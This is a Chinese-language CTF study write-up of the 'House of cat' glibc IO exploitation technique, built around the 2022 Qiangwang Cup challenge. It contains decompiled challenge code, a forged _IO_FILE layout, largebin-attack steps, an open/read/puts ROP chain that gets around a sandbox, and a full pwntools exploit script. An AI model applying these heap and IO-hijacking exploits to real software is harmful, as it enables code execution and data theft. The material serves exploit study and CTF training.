从这里开始就是对于现在比赛中新发现的并且利用效果优秀受到广泛好评的 IO 攻击利用方法了,主要就是House of cat 和 House of apple,先从House of cat 开始,记录学习的过程
House of cat 是 catf1y 师傅在2022年5月发现并总结的一种新型Glibc IO 利用方式,取自2022年强网杯的同名题
原文链接:House of cat新型glibc中IO利用手法解析 && 第六届强网杯House of cat详解
House of emma:第七届“湖湘杯” House _OF _Emma
house of cat 实际上承袭了House of emma的利用思路,依然是通过修改虚表指针的偏移来劫持程序的 IO 流来进行攻击,House of emma 利用的是 _IO_cookie_jumps
上的 pointer_chk_guard
(有时还需要爆破偏移)。而House of cat 利用的是 _IO_wfile_jumps
函数中的 _IO_wfile_seekoff
函数再转调用 _IO_switch_to_wget_mode
_IO_wfile_jumps ——> _IO_wfile_seekoff ——> _IO_switch_to_wget_mode(fp)
这条调用链避免了之前 House of emma 中绕过检测 TLS
上 _pointer_chk_guard
同时也避免了House of emma 中可能因为 stderr 的指针存放在 bss 段上而无法篡改,并且exit调用中存在调用指针保护的函数指针执行,使得无法执行正确的函数地址无法进行FSOP的问题,使 House of cat 在 FSOP 也可以进行,具体的操作方法为:改虚表 vtable
指针为 _IO_wfile_jumps+0x10
并结合 _malloc_assert食用
能任意写一个可控地址(如largebin attack)
能泄露 libc 地址和 heap 地址
能触发 IO 流(三种方式)
a. 调用exit或从main退出
b. puts、printf函数调用
c. _malloc_assert
源码 _IO_wfile_seekoff
off64_t _IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode) { off64_t result; off64_t delta, new_offset; long int count; if (mode == 0) return do_ftell_wide (fp); int must_be_exact = ((fp->_wide_data->_IO_read_base == fp->_wide_data->_IO_read_end) && (fp->_wide_data->_IO_write_base == fp->_wide_data->_IO_write_ptr)); #需要绕过was_writing的检测 bool was_writing = ((fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base) || _IO_in_put_mode (fp)); if (was_writing && _IO_switch_to_wget_mode (fp)) return WEOF; ...... }
其中引用了一个fp结构体来作为内函数调用的参数,此时若我们伪造fp结构体绕过上述的 must_be_exact 和 was_writing 检查函数,即:
(fp->_wide_data->_IO_read_base== fp->_wide_data->_IO_read_end) && (fp->_wide_data->_IO_write_base== fp->_wide_data->_IO_write_ptr)
(fp->_wide_data->_IO_write_ptr>fp->_wide_data->_IO_write_base) || _IO_in_put_mode (fp)
就可以执行 _IO_switch_to_wget_mode (fp)
源码 _IO_switch_to_wget_mode (fp)
int _IO_switch_to_wget_mode (FILE *fp) { if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base) if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF) return EOF; ...... }
绕过 fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
检查后会调用一个 (wint_t)_IO_WOVERFLOW (fp, WEOF)
#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
0x7ffff7c83cb0 <_IO_switch_to_wget_mode> endbr64
0x7ffff7c83cb4 <_IO_switch_to_wget_mode+4> mov rax, qword ptr [rdi + 0xa0]
0x7ffff7c83cbb <_IO_switch_to_wget_mode+11> push rbx
0x7ffff7c83cbc <_IO_switch_to_wget_mode+12> mov rbx, rdi
0x7ffff7c83cbf <_IO_switch_to_wget_mode+15> mov rdx, qword ptr [rax + 0x20]
0x7ffff7c83cc3 <_IO_switch_to_wget_mode+19> cmp rdx, qword ptr [rax + 0x18]
0x7ffff7c83cc7 <_IO_switch_to_wget_mode+23> jbe _IO_switch_to_wget_mode+56
0x7ffff7c83cc9 (_IO_switch_to_wget_mode+25) ◂— mov rax, qword ptr [rax + 0xe0]
0x7ffff7c83cd5 (_IO_switch_to_wget_mode+37) ◂— call qword ptr [rax + 0x18]
mov rax, qword ptr [rdi + 0xa0]
mov rdx, qword ptr [rax + 0x20]
mov rax, qword ptr [rax + 0xe0]
call qword ptr [rax + 0x18]
然后看看 rdi 此时的状态
泄露libc后,rdi、rax、rdx我们就都可以自主控制了,而利用这个 call [rax + 0x18]
开启沙箱,我们可以把最后调用的[rax + 0x18]设置为 setcontext
未开启沙箱,则只需把最后调用的[rax + 0x18]设置为 system
函数,把 fake_IO
为可控地址,在可控地址中伪造 fake_IO
结构体,利用 FSOP
为可控地址,在可控地址中伪造 fake_IO
结构体,利用 malloc_assert
其实就是在 _IO_wfile_seekoff 中
(fp->_wide_data->_IO_read_base== fp->_wide_data->_IO_read_end) && (fp->_wide_data->_IO_write_base== fp->_wide_data->_IO_write_ptr)
fake_io_addr=heapbase+0xb00 # 伪造的fake_IO结构体的地址 next_chain = 0 fake_IO_FILE=p64(rdi) #_flags=rdi fake_IO_FILE+=p64(0)*7 fake_IO_FILE +=p64(1)+p64(2) # rcx!=0(FSOP) fake_IO_FILE +=p64(fake_io_addr+0xb0)#_IO_backup_base=rdx fake_IO_FILE +=p64(call_addr)#_IO_save_end=call addr(call setcontext/system) fake_IO_FILE = fake_IO_FILE.ljust(0x68, '\x00') fake_IO_FILE += p64(0) # _chain fake_IO_FILE = fake_IO_FILE.ljust(0x88, '\x00') fake_IO_FILE += p64(heapbase+0x1000) # _lock = a writable address fake_IO_FILE = fake_IO_FILE.ljust(0xa0, '\x00') fake_IO_FILE +=p64(fake_io_addr+0x30)#_wide_data,rax1_addr fake_IO_FILE = fake_IO_FILE.ljust(0xc0, '\x00') fake_IO_FILE += p64(1) #mode=1 fake_IO_FILE = fake_IO_FILE.ljust(0xd8, '\x00') fake_IO_FILE += p64(libcbase+0x2160c0+0x10) # vtable=IO_wfile_jumps+0x10 fake_IO_FILE +=p64(0)*6 fake_IO_FILE += p64(fake_io_addr+0x40) # rax2_addr
call_addr:setcontext 或 system 的地址
__int64 __fastcall sub_1DF3(__int64 a1) { __int64 result; // rax unsigned int v2; // eax char *v3; // [rsp+18h] [rbp-8h] if ( *(a1 + 8) == 1 && !strcmp(*(a1 + 16), "admin") ) dword_4040[0] = 1; result = *(a1 + 8); if ( result == 3 ) { result = strtok(*(a1 + 16), "$"); v3 = result; if ( result ) { result = dword_4014; if ( *v3 == dword_4014 ) { result = dword_4040[0]; if ( dword_4040[0] ) { sub_161F(); v2 = sub_1675(); if ( v2 == 4 ) { return sub_1916(); } else { if ( v2 <= 4 ) { switch ( v2 ) { case 3u: return sub_188C(); case 1u: return sub_16DE(); case 2u: return sub_181B(); } } return sub_12D9("error!\n"); } } } } } return result; }
__int64 __fastcall sub_1A50(char *a1, __int64 a2) { char *s; // [rsp+18h] [rbp-28h] char *v4; // [rsp+20h] [rbp-20h] char *v5; // [rsp+20h] [rbp-20h] char *v6; // [rsp+20h] [rbp-20h] const char *s2; // [rsp+28h] [rbp-18h] char *v8; // [rsp+30h] [rbp-10h] const char *s1; // [rsp+38h] [rbp-8h] v4 = strstr(a1, "QWB"); if ( !v4 ) return 0LL; *v4 = 0; v4[1] = 0; v4[2] = 32; v5 = v4 + 3; s2 = strtok(a1, " "); if ( !strcmp("LOGIN", s2) ) { *(a2 + 8) = 1; } else if ( *(a2 + 8) || strcmp("DOG", s2) ) { if ( *(a2 + 8) || strcmp("CAT", s2) ) { if ( *(a2 + 8) || strcmp("MONKEY", s2) ) { if ( *(a2 + 8) || strcmp("FISH", s2) ) { if ( *(a2 + 8) || strcmp("PIG", s2) ) { if ( *(a2 + 8) || strcmp("WOLF", s2) ) { if ( *(a2 + 8) || strcmp("DUCK", s2) ) { if ( *(a2 + 8) || strcmp("GOLF", s2) ) { if ( *(a2 + 8) || strcmp("TIGER", s2) ) return 0LL; *(a2 + 8) = 10; } else { *(a2 + 8) = 9; } } else { *(a2 + 8) = 8; } } else { *(a2 + 8) = 7; } } else { *(a2 + 8) = 6; } } else { *(a2 + 8) = 5; } } else { *(a2 + 8) = 4; } } else { *(a2 + 8) = 3; } } else { *(a2 + 8) = 2; } v8 = strtok(0LL, " "); if ( v8 != strchr(v8, 124) ) return 0LL; *a2 = v8; s1 = strtok(0LL, " "); if ( strcmp(s1, "r00t") ) return 0LL; s = v5 + 5; v6 = strstr(v5, "QWXF"); if ( !v6 ) return 0LL; *v6 = 0; v6[1] = 0; v6[2] = 0; v6[3] = 32; *(a2 + 16) = s; return 1LL; }
__int64 sub_155E() { __int64 result; // rax result = unk_4168; *unk_4160 = unk_4168; return result; }
ssize_t add() { unsigned __int64 v1; // [rsp+0h] [rbp-10h] size_t size; // [rsp+8h] [rbp-8h] sub_12D9("plz input your cat idx:\n"); v1 = reading(); if ( v1 > 0xF || *(&unk_4060 + v1) ) return sub_12D9("invalid!\n"); sub_12D9("plz input your cat size:\n"); size = reading(); if ( size <= 0x417 || size > 0x46F ) return sub_12D9("invalid size!\n"); *(&unk_4060 + v1) = calloc(1uLL, size); if ( !*(&unk_4060 + v1) ) return sub_12D9("error!\n"); qword_40E0[v1] = size; sub_12D9("plz input your content:\n"); return read(0, *(&unk_4060 + v1), qword_40E0[v1]); }
add中用的是calloc函数,和 House of pig 有点像;然后只能申请 largebin chunk 。
void delete() { unsigned __int64 v0; // [rsp+8h] [rbp-8h] sub_12D9("plz input your cat idx:\n"); v0 = reading(); if ( v0 <= 0xF && *(&unk_4060 + v0) ) free(*(&unk_4060 + v0)); else sub_12D9("invalid!\n"); }
ssize_t show() { unsigned __int64 v1; // [rsp+8h] [rbp-8h] sub_12D9("plz input your cat idx:\n"); v1 = reading(); if ( v1 > 0xF || !*(&unk_4060 + v1) ) return sub_12D9("invalid!\n"); sub_12D9("Context:\n"); return write(1, *(&unk_4060 + v1), 0x30uLL); }
ssize_t edit() { unsigned __int64 v1; // [rsp+8h] [rbp-8h] if ( dword_4010 <= 0 ) return sub_12D9("nonono!!!!\n"); --dword_4010; sub_12D9("plz input your cat idx:\n"); v1 = reading(); if ( v1 > 0xF || !*(&unk_4060 + v1) ) return sub_12D9("invalid!\n"); sub_12D9("plz input your content:\n"); return read(0, *(&unk_4060 + v1), 0x30uLL); }
edit功能只能用两次,也就是说只有两次largebin attack的机会。
首先main函数也没有 exit 等返回方式,所以无法使用 FSOP
来触发 IO 调用链
所以只能利用 伪造 stderr
来进行 IO 调用链
而 stderr 不在bss段上,所以要用一次largebin attack来修改 libc 中的 stderr
另一次 largebin attack 需要稳定触发 IO 调用链,而 FSOP 无法使用,且没有malloc函数的情况下需要修改 top_chunk size
以触发 IO 流操作
和 top_chunk size
沙箱对 fd 有检查,所以不能直接设置 rdi,这里catf1y师傅非常巧妙的利用了 close(0)
add(0,0x420,b"000") #0 add(1,0x430,b"111") #1 add(2,0x418,b"222") #2 free(0) add(3,0x440,b"333") #3 show(0) #p1 p.recvuntil("Context:\n") libc_base = u64(p.recv(6).ljust(8,b"\x00")) -0x21a0d0 success("libc: " + hex(libc_base)) heap_base = u64(p.recv(6).ljust(8,b"\x00")) - 0x290 success("heap: " + hex(heap_base))
largebin chunk还是很好泄露 libc 和 heap 地址的
payload = fake_struct + p64(0)*7 + p64(rop_addr) + p64(ret) free(2) add(4,0x418,payload) free(4) #p2 # largebin attack edit(0,p64(libc_base+0x21a0d0)*2 + p64(heap_base+0x290) + p64(stderr-0x20)) #改stderr add(5,0x440,"55555") add(6,0x430,"./flag") add(7,0x430,"77777") add(8,0x430,rop) free(5) add(9,0x450,"9999") free(7) edit(5,p64(libc_base + 0x21a0e0)*2 + p64(heap_base + 0x1370) + p64(heap_base + 0x28e0-0x20 + 3)) #改top_chunk size
fake_struct = p64(0) #_IO_read_end fake_struct += p64(0) #_IO_read_base fake_struct += p64(0) #_IO_write_base fake_struct += p64(0) #_IO_write_ptr fake_struct += p64(0) #_IO_write_end fake_struct += p64(0) #_IO_buf_base fake_struct += p64(1) #_IO_buf_end fake_struct += p64(0) #_IO_save_base fake_struct += p64(fake_io_addr + 0xb0) #_IO_backup_base = rdx fake_struct += p64(setcontext + 61) #_IO_save_end = call_addr fake_struct += p64(0) #_markers fake_struct += p64(0) #_chain fake_struct += p64(0) #_fileno fake_struct += p64(0) #_old_offset fake_struct += p64(0) #_cur_column fake_struct += p64(heap_base + 0x200) #_lock = heap_addr or writeable libc_addr fake_struct += p64(0) #_offset fake_struct += p64(0) #_codecvx fake_struct += p64(fake_io_addr + 0x30) #_wfile_data rax1 fake_struct += p64(0) #_freers_list fake_struct += p64(0) #_freers_buf fake_struct += p64(0) #__pad5 fake_struct += p32(0) #_mode fake_struct += b"\x00"*20 #_unused2 fake_struct += p64(_IO_wfile_jumps + 0x10) #vatable fake_struct += p64(0)*6 #padding fake_struct += p64(fake_io_addr + 0x40) #rax2 -> to make [rax+0x18] = setcontext + 61
cat(1) p.sendlineafter(":",str(10)) gdb.attach(p,'b* (_IO_wfile_seekoff)') p.sendlineafter(":",str(0x450))
rop = p64(pop_rdi) + p64(0) + p64(close) #close(0) rop += p64(pop_rdi) + p64(flag_addr) + p64(pop_rax) + p64(2) + p64(syscall_ret) #open(flag) rop += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(flag_addr+0x10) + p64(pop_rdx_r12) + p64(0x100) + p64(0) + p64(read) #read(0,flag_addr+0x10,0x100) rop += p64(pop_rdi) + p64(flag_addr+0x10) + p64(puts) #puts(flag_addr+0x10)
from pwn import * ex = "./pwn" #context.log_level='debug' p = process(ex) elf = ELF(ex) libc = elf.libc p.send("LOGIN | r00t QWB QWXFadmin") #gdb.attach(p,"b *$rebase(0x1DF3)") #pause() def dbg(): gdb.attach(p) pause() def cat(choice): p.sendafter("mew mew mew~~~~~~\n","CAT | r00t QWB QWXF$\xff\xff\xff\xff") p.sendlineafter("plz input your cat choice:\n",str(choice)) def add(idx,size,content): cat(1) p.sendlineafter(":",str(idx)) p.sendlineafter(":",str(size)) p.sendafter(":",content) def show(idx): cat(3) p.sendlineafter(":",str(idx)) def free(idx): cat(2) p.sendlineafter(":",str(idx)) def edit(idx,content): cat(4) p.sendlineafter(":",str(idx)) p.sendafter(":",content) add(0,0x420,b"000") #0 add(1,0x430,b"111") #1 add(2,0x418,b"222") #2 free(0) add(3,0x440,b"333") #3 show(0) #p1 p.recvuntil("Context:\n") libc_base = u64(p.recv(6).ljust(8,b"\x00")) -0x21a0d0 success("libc: " + hex(libc_base)) h0 = p.recv(10).ljust(8,b"\x00") heap_base = u64(p.recv(6).ljust(8,b"\x00")) - 0x290 success("heap: " + hex(heap_base)) dbg() pop_rdi =libc_base + 0x000000000002a3e5 # pop rdi ; ret pop_rsi = libc_base + 0x000000000002be51 # pop rsi ; ret pop_rdx_r12 = libc_base +0x000000000011f497 # pop rdx ; pop r12 ; ret pop_rax = libc_base + 0x0000000000045eb0 # pop rax; ret; ret = libc_base + 0x0000000000029cd6# ret; stderr=libc_base+libc.sym['stderr'] setcontext=libc_base+libc.sym['setcontext'] close=libc_base+libc.sym['close'] read=libc_base+libc.sym['read'] puts=libc_base+libc.sym['puts'] syscall_ret=libc_base + 0x0000000000091396 # syscall; ret; _IO_wfile_jumps = libc_base +0x2160c0 fake_io_addr = heap_base + 0xb00 rop_addr = heap_base + 0x2050 flag_addr = heap_base + 0x17d0 # _flags = 0 #_IO_read_ptr = 0x421 fake_struct = p64(0) #_IO_read_end fake_struct += p64(0) #_IO_read_base fake_struct += p64(0) #_IO_write_base fake_struct += p64(0) #_IO_write_ptr fake_struct += p64(0) #_IO_write_end fake_struct += p64(0) #_IO_buf_base fake_struct += p64(1) #_IO_buf_end fake_struct += p64(0) #_IO_save_base fake_struct += p64(fake_io_addr + 0xb0) #_IO_backup_base = rdx fake_struct += p64(setcontext + 61) #_IO_save_end = call_addr fake_struct += p64(0) #_markers fake_struct += p64(0) #_chain fake_struct += p64(0) #_fileno fake_struct += p64(0) #_old_offset fake_struct += p64(0) #_cur_column fake_struct += p64(heap_base + 0x200) #_lock = heap_addr or writeable libc_addr fake_struct += p64(0) #_offset fake_struct += p64(0) #_codecvx fake_struct += p64(fake_io_addr + 0x30) #_wfile_data rax1 fake_struct += p64(0) #_freers_list fake_struct += p64(0) #_freers_buf fake_struct += p64(0) #__pad5 fake_struct += p32(0) #_mode fake_struct += b"\x00"*20 #_unused2 fake_struct += p64(_IO_wfile_jumps + 0x10) #vatable fake_struct += p64(0)*6 #padding fake_struct += p64(fake_io_addr + 0x40) #rax2 -> to make [rax+0x18] = setcontext + 61 print(hex(len(fake_struct))) payload = fake_struct + p64(0)*7 + p64(rop_addr) + p64(ret) free(2) add(4,0x418,payload) free(4) #p2 # largebin attack edit(0,p64(libc_base+0x21a0d0)*2 + p64(heap_base+0x290) + p64(stderr-0x20)) add(5,0x440,"55555") dbg() add(6,0x430,"./flag") add(7,0x430,"77777") rop = p64(pop_rdi) + p64(0) + p64(close) #close(0) rop += p64(pop_rdi) + p64(flag_addr) + p64(pop_rax) + p64(2) + p64(syscall_ret) #open(flag) rop += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(flag_addr+0x10) + p64(pop_rdx_r12) + p64(0x100) + p64(0) + p64(read) #read(0,flag_addr+0x10,0x100) rop += p64(pop_rdi) + p64(flag_addr+0x10) + p64(puts) #puts(flag_addr+0x10) add(8,0x430,rop) free(5) add(9,0x450,"9999") free(7) edit(5,p64(libc_base + 0x21a0e0)*2 + p64(heap_base + 0x1370) + p64(heap_base + 0x28e0-0x20 + 3)) cat(1) dbg() p.sendlineafter(":",str(10)) gdb.attach(p,'b* (_IO_wfile_seekoff)') p.sendlineafter(":",str(0x450)) p.interactive()
跟着 House of cat 学习下来,能明显感觉到比 House of emma 的复杂程度低了不少,原理也简单好懂,调用链明白清晰,是一个不可多得的优秀 IO 攻击方式。